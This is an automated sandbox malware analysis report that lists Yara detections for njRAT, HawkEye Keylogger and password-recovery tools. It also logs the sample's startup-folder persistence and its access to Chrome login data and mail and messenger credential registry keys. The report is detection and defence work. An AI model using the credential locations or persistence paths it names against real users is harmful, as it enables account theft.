Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack, type: UNPACKEDPE

Yara detected MailPassView

Show sources

Source: Yara match	File source: 0000000D.00000002.611737671.0000000004021000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.513995957.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tmpFB21.tmp.exe PID: 4928, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 1428, type: MEMORY
Source: Yara match	File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.4027e00.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.4027e00.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8ffa72.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8ffa72.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE

Yara detected Njrat

Show sources

Source: Yara match	File source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: d4c6a6df7bab3dad31763de990c4ed82.exe PID: 2244, type: MEMORY
Source: Yara match	File source: Process Memory Space: servieda.exe PID: 5648, type: MEMORY
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 5972, type: MEMORY
Source: Yara match	File source: Process Memory Space: Tmp.exe PID: 240, type: MEMORY
Source: Yara match	File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, type: DROPPED
Source: Yara match	File source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to steal Instant Messenger accounts or passwords

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic Salt

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail

Tries to steal Mail credentials (via file registry)

Show sources

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, PopPassword	14_2_00402D9A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: strcpy,strcpy,strcpy,strcpy,RegCloseKey, SMTPPassword	14_2_00402D9A
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Code function: ESMTPPassword	14_2_004033D7

Yara detected WebBrowserPassView password recovery tool

Show sources

Source: Yara match	File source: 0000000F.00000002.518251485.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.611737671.0000000004021000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tmpFB21.tmp.exe PID: 4928, type: MEMORY
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 5824, type: MEMORY
Source: Yara match	File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.4040020.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.4027e00.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.4040020.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a47b95.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE

Remote Access Functionality:

Detected HawkEye Rat

Show sources

Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger \| Execution Confirmed \|
Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger \| Stealer Records \|
Source: pgr.exe, 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
Source: tmpFB21.tmp.exe	String found in binary or memory: HawkEye_Keylogger_Stealer_Records_
Source: tmpFB21.tmp.exe	String found in binary or memory: HawkEyeKeylogger
Source: tmpFB21.tmp.exe	String found in binary or memory: HawkEye_Keylogger_Keylog_Records_
Source: tmpFB21.tmp.exe	String found in binary or memory: HawkEye_Keylogger_Execution_Confirmed_
Source: tmpFB21.tmp.exe, 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp	String found in binary or memory: kr'&HawkEye_Keylogger_Execution_Confirmed_
Source: tmpFB21.tmp.exe, 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp	String found in binary or memory: kr#"HawkEye_Keylogger_Stealer_Records_
Source: tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp	String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
Source: tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp	String found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger \| Execution Confirmed \|
Source: tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp	String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger \| Stealer Records \|
Source: tmpFB21.tmp.exe, 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp	String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_
Source: tmpFB21.tmp.exe.2.dr	String found in binary or memory: \pidloc.txt!HawkEyeKeylogger
Source: tmpFB21.tmp.exe.2.dr	String found in binary or memory: DisablenotifyMHawkEye_Keylogger_Execution_Confirmed_.txtUHawkEye Keylogger \| Execution Confirmed \|
Source: tmpFB21.tmp.exe.2.dr	String found in binary or memory: ==============================================EHawkEye_Keylogger_Stealer_Records_MHawkEye Keylogger \| Stealer Records \|
Source: tmpFB21.tmp.exe.2.dr	String found in binary or memory: .jpegCHawkEye_Keylogger_Keylog_Records_

Detected njRat

Show sources

Source: 79c06ef4ef423d882819c4e66285ec85.exe.2.dr, OK.cs	.Net Code: njRat config detected
Source: 2.2.pgr.exe.80000.0.unpack, OK.cs	.Net Code: njRat config detected
Source: 2.0.pgr.exe.80000.0.unpack, OK.cs	.Net Code: njRat config detected

Yara detected HawkEye Keylogger

Show sources

Source: Yara match	File source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.599349965.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.609034784.0000000003021000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.611403829.00000000039DF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.490757263.00000000008A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: tmpFB21.tmp.exe PID: 4928, type: MEMORY
Source: Yara match	File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe, type: DROPPED
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a3fd88.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8ffa72.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a8208.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a46190.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a9c0d.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.8a9c0d.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8ffa72.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a3fd88.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.0.tmpFB21.tmp.exe.8a8208.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.3a47b95.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.tmpFB21.tmp.exe.3048e00.4.raw.unpack, type: UNPACKEDPE

Yara detected Njrat

Show sources

Source: Yara match	File source: 00000000.00000003.361826559.000001B866181000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.375381174.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.434132652.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.386399141.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.418513533.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.364575966.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.599389764.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.431917812.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.355914114.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.404397604.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.599254975.0000000000082000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.360210292.0000000000696000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.361022264.000001B86606A000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.416270861.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.407415597.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.379800367.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.361732058.000001B8660A7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.409647935.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.608644673.00000000028C1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.429703452.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.363543444.000001B865F71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.384190622.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.420692346.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.600750205.00000000006AA000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.392012717.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.422988044.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.397417022.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.365445146.00000000001D2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.388634565.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.381975904.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.390816638.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.414035813.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.399625080.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.395800979.0000000000A72000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.363508087.000001B865F8D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.425183434.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.377587214.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.411854151.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.519777905.00000000006B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.427394879.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.401942814.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.436364231.00000000006AD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.369408079.000001B867140000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.360863456.0000000000082000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: d4c6a6df7bab3dad31763de990c4ed82.exe PID: 2244, type: MEMORY
Source: Yara match	File source: Process Memory Space: servieda.exe PID: 5648, type: MEMORY
Source: Yara match	File source: Process Memory Space: wscript.exe PID: 5972, type: MEMORY
Source: Yara match	File source: Process Memory Space: Tmp.exe PID: 240, type: MEMORY
Source: Yara match	File source: Process Memory Space: pgr.exe PID: 1068, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\servieda.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Tmp.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\pgr.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe, type: DROPPED
Source: Yara match	File source: 0.3.wscript.exe.1b86717d130.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b86717d130.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.wscript.exe.1b8660a7cb0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.pgr.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.pgr.exe.80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.servieda.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Tmp.exe.1d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.d4c6a6df7bab3dad31763de990c4ed82.exe.a70000.0.unpack, type: UNPACKEDPE

Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02CC0A8E listen,	13_2_02CC0A8E
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02CC0FC6 bind,	13_2_02CC0FC6
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02CC0A50 listen,	13_2_02CC0A50
Source: C:\Users\user\AppData\Local\Temp\tmpFB21.tmp.exe	Code function: 13_2_02CC0F93 bind,	13_2_02CC0F93

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Replication Through Removable Media1	Windows Management Instrumentation21	Startup Items1	Startup Items1	Disable or Modify Tools21	OS Credential Dumping1	Peripheral Device Discovery1	Replication Through Removable Media1	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
